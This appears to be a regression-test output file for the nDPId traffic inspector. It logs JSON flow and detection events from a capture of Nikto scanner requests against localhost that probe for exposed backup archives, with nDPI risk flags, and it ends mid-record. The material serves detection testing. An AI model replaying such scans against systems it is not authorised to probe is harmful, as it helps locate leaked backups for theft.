+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1576420277239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277239,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HMpAAEAGH21\/AAABfwAAAcRQH5BQEyRWh8Tqd4AYAED+swAAAQEICp1m\/R+dZv0eR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":356,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277239,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1576420277240,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277240,"pkt":"AAAAAAAAAAAAAAAACABFAADGqKRAAEAGk4t\/AAABfwAAAcRSH5A2yZA9R5wqAoAYAED+ugAAAQEICp1m\/SCdZv0gR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277240,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1576420277242,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277242,"pkt":"AAAAAAAAAAAAAAAACABFAADGoOxAAEAGm0N\/AAABfwAAAcRUH5C09Jh1W5zr34AYAED+ugAAAQEICp1m\/SKdZv0iR0VUIC9iYWNrdXAudGFyLmJ6MiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277242,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1576420277243,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277243,"pkt":"AAAAAAAAAAAAAAAACABFAADIi9VAAEAGsFh\/AAABfwAAAcRWH5DRYLNOcO51UIAYAED+vAAAAQEICp1m\/SOdZv0jR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":359,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1576420277244,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277244,"pkt":"AAAAAAAAAAAAAAAACABFAADIKHJAAEAGE7x\/AAABfwAAAcRYH5BlBxDwgejT24AYAED+vAAAAQEICp1m\/SSdZv0kR0VUIC8xMjcuMC4wLjEudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":360,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277244,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1576420277246,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277246,"pkt":"AAAAAAAAAAAAAAAACABFAADF\/A9AAEAGQCF\/AAABfwAAAcRaH5B2IcSTgB9qe4AYAED+uQAAAQEICp1m\/SWdZv0lR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277246,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1576420277247,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277247,"pkt":"AAAAAAAAAAAAAAAACABFAADFi69AAEAGsIF\/AAABfwAAAcRcH5D\/WbMzZ3h33IAYAED+uQAAAQEICp1m\/SedZv0nR0VUIC8xMjdfMF8wXzEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277247,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1576420277248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277248,"pkt":"AAAAAAAAAAAAAAAACABFAADDpjtAAEAGlfd\/AAABfwAAAcReH5CBd56aTxXXOIAYAED+twAAAQEICp1m\/SidZv0oR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":363,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277248,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1576420277249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277249,"pkt":"AAAAAAAAAAAAAAAACABFAADDeldAAEAGwdt\/AAABfwAAAcRgH5A4o0L2zMH\/yIAYAED+twAAAQEICp1m\/SmdZv0pR0VUIC8xMjcuMC4wLnppcCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":364,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277249,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1576420277252,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277252,"pkt":"AAAAAAAAAAAAAAAACABFAADCJxNAAEAGFSF\/AAABfwAAAcRiH5BR2x+x8C2V44AYAED+tgAAAQEICp1m\/SydZv0rR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277252,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1576420277253,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277253,"pkt":"AAAAAAAAAAAAAAAACABFAADClhFAAEAGpiJ\/AAABfwAAAcRkH5B3iK6vsi1CtIAYAED+tgAAAQEICp1m\/S2dZv0tR0VUIC8xMjcudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277253,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 